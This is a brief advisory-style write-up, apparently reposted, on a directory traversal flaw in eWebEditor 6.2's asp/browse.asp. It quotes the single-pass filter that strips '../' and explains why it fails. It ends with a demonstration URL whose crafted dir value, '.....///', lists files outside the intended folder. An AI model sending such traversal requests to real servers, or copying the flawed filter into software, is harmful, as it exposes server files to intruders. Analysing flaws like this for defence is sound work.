eWebEditor 6.2 directory traversal vulnerability (asp/browse.asp)
番茄系统家园 · 2022-03-13 10:48:34
Source of asp/browse.asp (the relevant section):

Dim s_ReturnFlag, s_FolderType, s_Dir
Dim s_CurrDir
s_ReturnFlag = Trim(Request.QueryString("returnflag"))
s_FolderType = Trim(Request.QueryString("foldertype"))
s_Dir = Trim(Request("dir"))
Select Case s_FolderType
    Case "upload"
        s_CurrDir = sUploadDir
    Case "shareimage"
        sAllowExt = ""
        s_CurrDir = sPathShareImage
    Case "shareflash"
        sAllowExt = ""
        s_CurrDir = sPathShareFlash
    Case "sharemedia"
        sAllowExt = ""
        s_CurrDir = sPathShareMedia
    Case Else
        s_FolderType = "shareother"
        sAllowExt = ""
        s_CurrDir = sPathShareOther
End Select
s_Dir = Replace(s_Dir, "\", "/")
'Filter against directory traversal; the vulnerability is here
s_Dir = Replace(s_Dir, "../", "")   'replace ../ with an empty string
s_Dir = Replace(s_Dir, "./", "")    'replace ./ with an empty string
If Left(s_Dir, 1) = "/" Then
    s_Dir = ""
End If
Dim s_Dir2
s_Dir2 = Replace(s_Dir, "/", "\")
If s_Dir <> "" Then
    If CheckValidDir(s_CurrDir & s_Dir2) = True Then
        s_CurrDir = s_CurrDir & s_Dir2
    Else
        s_Dir = ""
    End If
End If
Replacing "../" and "./" with the empty string is meant to block directory traversal, and it is the usual kind of filter. But Replace runs only a single pass, so "....//" can be used to reach the parent directory: after the replacement, "....//" becomes "../".
Demonstration:
http://localhost/asp/browse.asp?action=file&type=file&dir=.....///DiaLog&style=full650&cusdir=&foldertype=upload&returnflag=span_upload
This request jumps to eWebEditor's DiaLog directory; viewing the page source then shows the file listing of that directory.
Original article: https://m.nndssk.com/wlaq/172495r4vABF.html

